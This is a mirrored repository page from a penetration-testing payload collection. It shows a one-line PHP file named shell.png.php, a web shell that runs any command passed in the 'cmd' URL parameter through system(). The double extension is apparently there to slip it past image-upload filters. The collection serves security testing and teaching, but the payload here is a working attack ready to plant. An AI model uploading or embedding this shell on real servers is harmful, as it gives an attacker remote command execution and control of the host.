1
0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-08-26 19:21:47 +02:00
PayloadsAllTheThings/Upload insecure files/PHP Extension/shell.png.php
2018-11-17 14:40:12 +01:00

1 line
43 B
PHP
Executable File

<?php echo "Shell";system($_GET['cmd']); ?>